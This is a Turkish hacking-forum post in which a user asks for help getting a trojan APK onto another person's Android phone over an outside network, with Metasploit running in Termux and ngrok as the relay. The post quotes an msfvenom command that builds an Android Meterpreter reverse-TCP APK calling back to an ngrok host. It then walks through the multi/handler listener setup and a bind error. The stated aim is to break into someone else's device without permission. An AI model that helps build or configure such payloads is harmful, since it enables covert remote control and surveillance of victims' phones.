Mobil Metasploit İle Dış Ağa NASIL Trojan atabilirim

THTOnion

Yeni üye
20 Mar 2022
35
5
SELAMIN ALEYKÜM
Arkadaşlar acil yardıma ihtiyacım var 3 Gündür dış ağa trojan payloads oluşturup cihazına sızmak istiyorum ve bunun için ngrok kullanıyorum ngrokum sağlam ve hazır resimde mevcuttur Screenshot 2022 05 30 14 05 15 652 com.termux ve karşı tarafa bir trojan apk oluşturup bunu atacağım dinlemeye alacağım anlamadığım kısım şu ben ngrokta lhosta ve lporta bunları mi yazacağım bunları yazınca evet bir payload oluşuyor APK fakat dinlemeye gelince hata veriyor payload yaparken yazdığım kodlar şu bunları kullanınca APK oluyor iniyor👇
msfvenom -p android/meterpreter/reverse_tcp lhost=4.tcp.ngrok.io lport=13959 -o /sdcard/sosyalmuhndslk.apk

Fakat msfconsole geliyorum
> use exploit/multi/handler yazıyorum
ardından
> set payload android/meterpreter/reverse_tcp yapıyorum buraya kadar herşey başarılı oluyor fakat > set lhost ve > setlport a ne gireceğimi bilmiyorum çok araştırdim ve bazı değerler girdim fakat hep bana şu hatayı veriyor nerde hata yapıyorum ben anlamıyorum ne yazicam kafam almıyor

[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >

Arkadaşlar Allah rızası için şuna bir el atın ya dinleme yapacağım zaman lhosta ve lporta ne yazacağım android termux için istiyorum PC için söylemeyin büyük bir sanal makinem yok :(
Net bir cevap verirseniz çok minnettar olurum teşekkür ederim 😔😐.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.